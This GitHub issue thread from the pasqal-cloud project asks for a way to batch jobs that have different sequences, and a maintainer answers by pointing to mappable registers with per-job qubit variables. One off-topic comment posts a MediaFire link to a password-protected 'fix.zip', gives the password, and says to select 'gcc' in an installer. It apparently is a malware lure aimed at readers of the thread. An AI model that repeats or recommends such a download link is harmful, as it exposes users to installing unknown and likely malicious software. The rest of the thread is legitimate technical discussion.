### ISSUE TITLE
Feature Suggestion: Batching jobs with different sequence

### ISSUE THREAD

**Issue by ShaheenPasqal** [pasqal-io/pasqal-cloud#134]
# Description 

I'd like to suggest the introduction of a way to group jobs of different sequences but with the same "job parameters" (e.g. number of runs, Omega_max, etc.). 

In machine learning training or inference scenarios, it's common to have datasets with different graphs (i.e. different register),  resulting in the current API in multiple batch submissions. More precisely, one batch of one jobs per element in the dataset. This leads to cluttered views and increased complexity when trying to monitor progress. 

# Feature request:

Create a feature that allows users to group jobs with different sequences.

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MatthieuMoreau0** [comment]
Hey Shaheen! How does each job of your batch differ? Is it only the register? Do they all derive from the same layout? If yes, you can create a single batch by defining only a mappable register for your sequence. Then for each job, you can define the traps you want to use by adding a `qubits` argument to the job variables. I now see we are lacking documentation for this feature.

Would that cover your use case? If so, I can send you some examples on how to do that.

In any case I'll add a ticket to our backlog to extend the documentation around batches with mappable registers.

**Comment by ShaheenPasqal** [comment]
Hello Matthieu, 

That is exactly my case !  Thank you for the answer and the example.
